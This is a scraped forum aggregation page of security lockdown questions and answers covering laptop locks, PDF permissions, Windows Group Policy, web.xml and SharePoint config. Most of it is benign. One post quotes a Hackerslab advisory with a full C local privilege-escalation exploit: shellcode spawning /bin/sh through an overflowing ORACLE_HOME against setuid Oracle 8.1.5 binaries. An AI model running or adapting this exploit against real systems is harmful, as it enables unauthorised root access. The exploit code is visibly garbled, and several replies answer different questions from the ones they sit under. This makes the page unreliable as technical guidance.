Security - Locking Down Oracle 9i

Similar Messages

• T400 Docking station not a secure lock down.

  There is a rash of theft currently where I work. It seems that the docking station will release a laptop even though it is locked down. I am wondering if the cable lock should attach to the laptop instead of the docking station. That will be a pain to do with as many meetings that we go to.
  Has anyone else seen this problem or know of a better solution? Is there a known problem with a mechanical issue with the dock station? Other then the obvious of installing cameras.

  If security is a concern, I would lock the laptop instead of the docking station. From what I understand, when you lock a docking station, it prevents the mechanical arms on the pad from allowing the laptop to be removed; however, these mechanical arms (plus the docking station locking mechanism) provide nowhere near the security that a Kensington-style lock does. For maximum protection, I would recommend locking BOTH the docking station and the laptop with a flat key or combination computer lock (dual/twin-headed locks are available). A final note - a thief will probably be much more reluctant to rip out the lock from the computer than the docking station.

• What are the security settings to lock down a form with fillable fields and yet allow someone with Reader to fill in the fields as will as save the form and print it?

  What are the security settings to lock down a form with fillable fields and yet allow someone with Reader to fill in the fields as will as save the form and print it?

  You want to allow someone to open your document and fill out the form (in the fields you have created), but not change or edit the form, right? Here's the answer - assuming you are using Acrobat Pro and someone will be opening the PDF using at least Acrobat Reader 9 and up:
  Tools > Protection > Encrypt < Encrypt with Password
  Answer YES to change the security.
  A new window opens:
       Do NOT select Document Open (or that will require a password to open the document.)
       Select: Permissions (Check the box next to "Restrict editing and printing of the document.")
       Change the following 2 settings from the drop-down box:
            Printing Allowed: Select High Resolution
            Changes Allowed: Select Commenting, filling in form fields, and signing signature fields
            Leave selected: "Enable text access for screen reader devices for the visually impaired"
            Change Permissions Password (insert a strong password)
            Leave all other settings alone in "Options"
            OK - OK
            Re-enter the Permissions Password (the one you entered above)
            OK - OK
            Save the PDF to apply the security [notice that (SECURED0 will appear after the document title]

• Locked down security and running captivate clips

  I am relatively new to Captivate. And in trying to publish I
  have run accross a roadblock. We have locked down security so much
  that most of my audience cannot open the files. When trying to
  Publish as an SWF they are seeing Active X messages and then when
  they agree, the window stays blank or they get a message that
  windows blocked the software because it can’t determine the
  publisher. If they try to run it as an executable they do not have
  rights either. Can you give me ideas on how to make this available
  with very limited rights?

  Hi TC64
  I believe what may be happening here is that the messages are
  appearing because of the external JavaScript reference. (Captivate
  versions 2 & 3 normally reference a JavaScript file called
  "standard.js") Oddly enough, this is done in an effort to bypass
  the "Click to activate and use this control" message that only IE
  presents.
  One way to work past the need for the standard.js file is
  described in a section of fellow Adobe Certified Captivate
  Instructor John Daigle's article about working with Captivate and
  RoboHelp. You may view it by
  clicking
  here. Pay close attention to how he is describing the
  JavaScript modifications.
  This may or may not totally resolve your issue, but it's
  certainly worth a try!
  Cheers... Rick

• How do you modify the web.xml to lock down the pages from a user role

  how do you modify the web.xml to lock down the pages from a user role

  I'll make a stab at your question:
  The following is an example of where a URL is protected within a web.xml deployment descriptor. In this example, the URL /protectedA within the application is protected:
  <!-- security constraints -->
  <security-constraint>
  <web-resource-collection>
  <web-resource-name>protectedA</web-resource-name>
  <url-pattern>/protectedA</url-pattern>
  </web-resource-collection>
  <!-- authorization -->
  <auth-constraint>
  <role-name>sr_developer</role-name>
  </auth-constraint>
  </security-constraint>
  Sun's explaination here:
  http://java.sun.com/j2ee/1.4/docs/tutorial/doc/Security4.html

• Would like to know how to Completely Lock-down Windows 7 OS

  I don't have a general question..
  It's more like specifics about how to lock down windows 7 computers..
  Here's a little background information...
  I have two computers, both with win 7(Pro, and home prem).
  A family member can somehow bypass all bios and all windows security services... Everytime I go to work or school, he will power on my desktop and somehow 'hack' into the OS and install keyloggers or viruses so he can obtain my banking or other personal information.
  He also unlocks and deletes all the passwords so he can have access whenever he wants..
  Can someone please tell me how to do a complete lockdown? This is getting extremely annoying.. I've done everything that I can do; Also considering on switching my major to some sort of computer security. I'm starting to lose my mind over these months.. All
  help is appreciated.
  I've password protected BIOS
  I've disabled administrator accounts, i've put password on the admin and the guest user; locked the option to change passwords..
  All help is appreciated. Thank you all in advance.

  Hi,
  If you are using Windows 7 Professional, Ultimate, or Enterprise, you can use the Local Group Policy Editor to change policies that affect the security of your computer. Please check if the following policies meet you requirements.
  [User Configuration\Administrative Templates\Windows Components\Windows Explorer]
  Enable these two polices:
  Prevent access to drives from My Computer
  Hide these specified drives in My Computer
  For your reference:
  Lock Down PCs with Windows 7:
  http://technet.microsoft.com/en-us/windows/gg983426.aspx
  Also, restrict Which Programs a User Can Run. You can set rules in AppLocker in the Group Policy Editor that prevents all programs from being run.
  In addition, temporarily Lock Your Computer if Someone Tries to Guess Your Password
  If you share your computer with other family members or allow your friends to use it, you should have a password on your Windows account so no one else can log into it. However, someone may try to guess your password and log into your account. If this happens,
  you can temporarily lock your computer.
  You should also periodically change your password.
  If you suspect, you family member using a tool to bypass your password. You may use Malicious Software Removal Tool (http://www.microsoft.com/security/pc-security/malware-removal.aspx)
  to remove it.
  Hope it helps.
  Regards,
  Blair Deng
  Blair Deng
  TechNet Community Support

• Need suggestion on locking down student imacs

  Hello, I just inherited a handful of computer labs. 8 imacs each spread out between 5 schools. 3 labs have internet access and 2 labs do not. Since I'm a complete noob when it comes to Mac OS Security what would someone recommend as my first step to locking down the computers. The students have tons of shortcuts on the desktop,downloaded mp3's, movies, myspace, facebook etc..It's a mess. Is there any 3rd party software that can manage desktops or can Mac OS do it all?
  Thanks

  Oh another Internet one I forgot...
  http://www.netnanny.com/mac?pid=3&gclid=CLmq6-zMzpkCFRFMagoduSShtQ
  Parental Controls in Leo...
  http://www.apple.com/macosx/features/parentalcontrols.html
  For even more control you can do Get Infos from the finder on the files/folders and change permissions so they can't write, only read, or no access.

• Security vulnerability in Oracle 8.1.5

  The following email was forwarded to me about possible security vulnerabilities.
  I am looking for verification from both Oracle and the user comunity.
  ================================================================================
  [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
  ================================================================================
  File : Oracle 8.1.5
  SYSTEM : LINUX
  Tested by RedHat Linux 6.2
  INFO :
  There are two security vulnerability in Oracle.
  1. buffer overflow
  It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
  one of the environmental value of Oracle.
  Oracle applications that are vulnerable to buffer overflow are as follow :
  - names
  - namesctl
  - onrsd
  - osslogin
  - tnslsnr
  - tnsping
  - trcasst
  - trcroute
  Thease applications allow an attacker to excute a buffer overflow exploit.
  2. Log-files created
  When a user excutes one of Oracle applications such as names, oracle or tnslsnr,
  following log files are created.
  names
  ======
  -rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
  -rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
  -rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
  oracle
  ======
  -rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
  tnslsnr
  =======
  -rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
  SOLUTION
  Contact your vendor for a patch or close setuid permission.
  # su - oracle
  $ cd /oracle_8.1.5_install_directory/bin
  $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
  ==-------------------------------------------------------------------------------==
  * ** ** * [email protected] [yong-jun, kim]
  * ** ** * [ [URL=http://www.hackerslab.org]http://www.hackerslab.org ]
  ******** HACKERSLAB (C) since 1999
  ==-------------------------------------------------------------------------------==
  Oracle 8.1.5 exploit
  -by loveyou
  offset value : -500 ~ +500
  #include <stdio.h>
  #include <stdlib.h>
  #define BUFFER 800
  #define NOP 0x90
  #define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
  char shellcode[] =
  /* - K2 - */
  /* main: */
  "\xeb\x1d" /* jmp callz */
  /* start: */
  "\x5e" /* popl %esi */
  "\x29\xc0" /* subl %eax, %eax */
  "\x88\x46\x07" /* movb %al, 0x07(%esi) */
  "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
  "\x89\x76\x08" /* movl %esi, 0x08(%esi) */
  "\xb0\x0b" /* movb $0x0b, %al */
  "\x87\xf3" /* xchgl %esi, %ebx */
  "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
  "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
  "\xcd\x80" /* int $0x80 */
  "\x29\xc0" /* subl %eax, %eax */
  "\x40" /* incl %eax */
  "\xcd\x80" /* int $0x80 */
  /* callz: */
  "\xe8\xde\xff\xff\xff" /* call start */
  "/bin/sh";
  unsigned long getesp(void)
  __asm__("movl %esp,%eax");
  int main(int argc, char *argv[])
  char buff, ptr,binary[120];
  long *addr_ptr, addr;
  int bsize=BUFFER;
  int i,offset;
  offset = 0 ;
  if ( argc > 1 ) offset = atoi(argv[1]);
  buff = malloc(bsize);
  addr = getesp() - 5933 - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
  *(addr_ptr++) = addr;
  memset(buff,bsize/2,NOP);
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
  *(ptr++) = shellcode;
  buff[bsize - 1] = '\0';
  setenv("ORACLE_HOME",buff,1);
  printf("[ offset:%d buffer=%d ret:0x%x ]\n",
  offset,strlen(buff),addr);
  system(PATH);
  null

  Hi Peter,
  I was told that Oracle8 and Oracle8i Parallel Server on IBM
  RS/6000 AIX comes with its own Lock Manager and this LM does not
  rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
  Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
  (Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
  HACMP but came with a special LM.)
  Cluster-wide Filesystems are not used for OPS on Unix, as far as
  I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
  must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
  Logical Volumes on AIX).
  So I guess it should be possible for Oracle to port OPS to Linux.
  No special Cluster-Services would be needed for OPS on Linux,
  just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
  100BaseT).
  Peter Sechser (guest) wrote:
  : Dave,
  : Parallel Server needs some cluster services in order to
  : communicate between several nodes. So, the operating system has
  : to offer things like inter-node communication services,
  : cluster-wide lock communication services and a clusterwide
  : filesystem. I'm not quite sure, to what degree Linux
  offers/will
  : offer these services.
  : Peter
  null

• Locking down multiple PDF's at a time

  We want to lock down multiple PDFs at once, meaning we do not want people to be able to save the files or copy text in the PDFs.  When we turn it on one at a time we go to File- Properties- Security tab and change the security method to Password security and so on. We would love to find a way to change that on multiple PDFs at a time. I have done searches for how to do this and they say to click on advanced- Document processing- Batch processing. I am using acrobat 9 Standard and I am not able to see batch processing. Do I need to upgrade to Pro? Or is there a different way to accomplish this task that I am missing?
  Thanks

  I have upgraded to PRO and I still only see this. When I did the install I told it to do a complete install. Is there a plug-in that I need to have for this to work? Any other ideas would be helpful.
  I

• Kensington Security Locks don't Fit into Kensington Security Slot

  Hello all, I'm just about to go back to college and I have this new MBP. Considering my dorm is in an uptown manhattan brownstone, I'm kinda worried about my MBP's security. So I decided to use a cable lock as a mild theft deterrent when I leave to shower, etc. But the problem is, after all the Kensington security cables I've tried, none would fit, even though on the MBP's specs page, it says "Kensington cable lock slot" for security.
  As you can read in these reviews, it seems that many people w/ MBPs can't get their cable locks to work:
  http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore?spart=T7229LL%2FA#re v
  I have tried their keyed and combo locks, as well as trying a display port screw lock (but due to the design of the MBP's DVI port, the screw lock cannot mount), to no avail. Nothing will work.
  So besides from ordering a locked down metal case or a safe (which will be quite tedious every time I need to go somewhere), what should I do? (And yes, I will have the software anti-theft things installed)

  No, the lock comes with three seperate spacers that fit around the head of the lock where it fits into the computer, thus preventing the lock from moving on the computer and scratching the casing. The lock also included a 'base plate' which allows you to screw it into a desk, table, wall etc. if you have nothing that you could securely put the cable around.
  John

• Directory preferences in a locked down PC environment

  How do I change:
  ide.pref.dir
  ide.pref.dir.base
  ide.user.dir
  ide.work.dir
  ide.work.dir.base
  user.home
  so that they don't reference a windows path like \\<server>\<user>$, but <drive letter>:\Oracle\sqldeveloper instead
  We use locked down PC's (with no access to the A: and C: drives) . And when we start SQLD we get 16 dialogue windows say that it cannot access the A: drive, to which we press the continue button. You also get the message when using the File navigator and the File->Open or File-Save functions.
  On upgrade from 1.5.1 to 1.5.4 the number of dialogue windows dropped from 16 to 2.
  We also always lose our connextions and have to reimport from a saved file every morning.
  A response to thread Connections fail to load at startup by user user641239 at 1-sep-2008 0:59 seems to have the solution - except it requires access to regedit. We don't have that. It's much too painful to get SQLD part of the PC build at the customer, so we need to be able to configure without resorting to regedit.
  Any help appreciated.
  Nic
  Edited by: Nic Atkin on 17-apr-2009 2:41
  Edited by: Nic Atkin on 17-apr-2009 2:54

  Hi FurryOne,
  There is a way to hide both A: and C: - but you need Windows Administrator rights to do it. Not possible in a locked down PC, So I'll live with it for now.
  I was also having the Configure File Type Associations at startup everytime problem (see
  Re: Configure File Type Associations at startup everytime
  So, my current solution looks like this:
  AddVMOption -Dide.pref.dir.base=M:\Oracle\
  AddVMOption -Dide.pref.dir=M:\Oracle\sqldeveloper
  AddVMOption -Dide.user.dir.base=M:\Oracle\
  AddVMOption -Dide.user.dir=M:\Oracle\sqldeveloper
  AddVMOption -Dide.work.dir.base=M:\Oracle\
  AddVMOption -Dide.work.dir=M:\Oracle\sqldeveloper
  AddVMOption -Duser.home=M:\
  AddVMOption -Dno.shell.integration=true

• Can we lock down user admin functionality to allow password changes only?

  Hi,
  Is it possible to lock down the user admin functionality so a specific role can only change passwords?
  We have a large user base of >10K infrequent users that are forced to change their passwords every 30 days. We suspect a lot will require password changes and we are keen to not have the tech team spending most of their time dealing with such requests. We would like to pass this task onto data management but not allow them the system administrator functionality.
  We know we can create a responsibility with a limited menu available so the operator can see only the security/user/define menu. But this will still allow the person to add responsibilities to existing user accounts and create new user accounts, both of which are deemed unacceptable security risks. Is it possible to lock down the form as well as the menu? Allowing operators to only change the password of existing users? Or can we use the custom.pll to error when a user tries to do anything except edit the password field when in this role?
  Thanks
  Matt

  You should be able to do that. You would create a new privilege level (ie 7), assign all commands to that level except (this is my guess) the command vpn-sessiondb, you would put that at a lower privilege level (ie 6). Here's a write-up that may help getting you in the right direction.
  http://www.packetpros.com/2012/08/read-only-asdm.html

• Locking down Win 8.1

  For security reasons, i need to investigate how to lock down windows 8.1 so that the user is restricted to the desktop only and only has access to a
  certain few applications.
  These PC's are in a domain and are used for either Accounting or POS.
  The software is what it is and changing the software is not an option. 
  Right now, the users log into XP machines. The desired programs auto-load and all is well.
  As of April 1st, the XP POS machines will no longer be PCI compliant. We prefer to step up to win 8.1 stations, but locking them down via group policy is proving to be difficult.
  We don't want third party tools. 
  Certainly this must be achievable via group policy.
  Any assistance will be greatly appreciated.
  Thanks 
  Jerry C
  (originally asked in answers.microsoft.com)

  Jerry
  I am sure you have but have you looked at kiosk mode?
  http://www.geek.com/microsoft/windows-8-1-kiosk-mode-locks-systems-to-a-single-app-1552963/
  http://blogs.msdn.com/b/hyperyash/archive/2013/10/25/enable-kiosk-mode-in-windows-8-1.aspx
  If Kiosk doesnt cut it the below thread has a bit about how to lock it down via GP.
  http://social.technet.microsoft.com/Forums/en-US/6c67d219-dba9-4de8-988f-ae46b19b2ccb/windows-81-kiosk-mode?forum=w8itproinstall
  Wanikiya and Dyami--Team Zigzag

• Best Practise to lock down server 2012 for Junior Admins

  We require locking down the desktop for junior admins. Essentially we would like for them to only access specific tools and applications.
  Below are examples of specific tools they would require access to however, if we want to block out everything else then what is the best way to go about that? I would image a combination of group rights? how best to handle this?
  Examples
  All Programs->Accessories->System Tools->System Information. then export report.
  "ipconfig /all
  go to Run and then type "systeminfo" and capture all data.

  You can use security group and delegation of administration model.
  http://technet.microsoft.com/en-us/library/cc755982(v=WS.10).aspx
  Santhosh Sivarajan | Houston, TX | www.sivarajan.com
  ITIL,MCITP,MCTS,MCSE (W2K3/W2K/NT4),MCSA(W2K3/W2K/MSG),Network+,CCNA
  Windows Server 2012 Book - Migrating from 2008 to Windows Server 2012
  Blogs: Blogs
  Twitter: Twitter
  LinkedIn: LinkedIn
  Facebook: Facebook
  Microsoft Virtual Academy:
  Microsoft Virtual Academy
  This posting is provided AS IS with no warranties, and confers no rights.

• Is it possible to lock down the _vti_bin and _layouts pages with a wildcard option.

  Hi all,
  A client of mine is running an internet facing sharepoint site. I have managed to lock down the _vti_bin and _layouts pages users for anonymous by using the following entries in my main web.config file:
  <location path="_layouts">
        <system.web>
          <authorization>
            <deny users="?" />
          </authorization>
        </system.web>
      </location>
  and
  <location path="_vti_bin">
        <system.web>
          <authorization>
            <deny users="?" />
          </authorization>
        </system.web>
      </location>
  But this is only ok for the root site collection. Is there a way to lock down all site collections, including sub sites with a type of wildcard entry?
  Due to the nature of the clients business, they will be creating many site collections and subsites. I am trying to find a scalable way to manage this. To add an entry for every new site collection or subsite that gets created on the fly does not seem like
  the most manageable solution.
  Any suggestions would be appreciated.
  Regards
  Mirco

  Hi Sachin,
  Thank You very much for the feedback. The info to secure system pages from authenticated FBA users is very helpful and I will definitely  implement it.  With reference to your second post. This is actually the information I used to lock down my
  sites from anonymous users. Applying this method I noticed that you needed to put an entry for every single site collection and sub site collection, e.g. if I ONLY had a site collection at
  https://me.myserver.com then the following entries in the web.config would secure the _vti_bin and _layouts folder from anonymous users:
  <location path="_layouts">
        <system.web>
          <authorization>
            <deny users="?" />
          </authorization>
        </system.web>
      </location>
  and
  <location path="_vti_bin">
        <system.web>
          <authorization>
            <deny users="?" />
          </authorization>
        </system.web>
      </location>
  But lets say I added another site collection at
  https://me.myserver.com/sites/mysitecollection I would have to add the following entries to the web.config file to secure it from anonymous users:
  <location path="sites/mysitecollection/_layouts">
        <system.web>
          <authorization>
            <deny users="?" />
          </authorization>
        </system.web>
      </location>
  and
  <location path="sites/mysitecollection/_vti_bin">
        <system.web>
          <authorization>
            <deny users="?" />
          </authorization>
        </system.web>
      </location>
  Now this method might be manageable if you are only gonna have 5 or 10 site or subsite collections. My client will have 30, 40, 50, who knows how many. This is why I am trying to find a more manageable way of locking these sites down.
  You can imagine what my web.config will look like eventually and the admin involved in continuously adding these entries to the web.config file to keep it safe from anonymous users.
  Regards
  Mirco